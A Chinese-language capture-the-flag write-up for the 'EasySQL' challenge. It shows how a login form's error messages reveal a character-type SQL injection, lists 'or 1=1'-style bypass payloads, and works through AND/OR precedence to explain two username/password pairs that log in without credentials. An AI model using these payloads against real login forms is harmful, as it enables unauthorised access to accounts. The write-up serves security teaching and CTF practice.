【极客大挑战 2019】EasySQL

[极客大挑战 2019] EasySQL#

判断是数字还是字符型注入

正常查询的回显

输入字符型判断一下，发现报错了，看报错显示 ‘1’‘’,输入的是1’，这里查询语句中应该是存在一个单引号的，所以这里报错了，多了一个单引号，说明这里存在字符型的注入，先用万能钥匙测测

使用万能钥匙一测，第一次 正常回显错误，然后又用字符型的测了一下，发现这里的报错中带有 一部分的查询语句

# 万能公式
1 and 1=1
1' and '1'='1
1 or 1=1 
1' or '1'='1

为什么用 1’ and ‘1’='1不行呢？

测试的时候输入了 1’ and ‘1’=1这个有问题的payload，看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询，and 的两边同时为TRUE 结果才能为 TRUE，所以输入的payload一定要符合这个条件就可以登录成功了。

# payload
SELECT * FROM tables WHERE username='1' or '1'='1' and password='1' or '1'='1'
# 优先级排序：and 优先级高于 or，所以要计算 and 然后再计算 or
username='1'--->false
'1'='1'---> true
passwrod='1'--->false
'1'='1'--->true
false or (true and false) or true
false or false or true
false or true
#得出结果：true

照这种方法就可以推算出不同的解法

# payload1
# 用户名：1' and '1'='1
# 密码：1' or '1'='1

# payload2
# 用户名：1' and '1'='2
# 密码：1' or '1'='1

# 本质上都是利用 and 和 or 的优先级进行判断，只要返回 TRUE 就没问题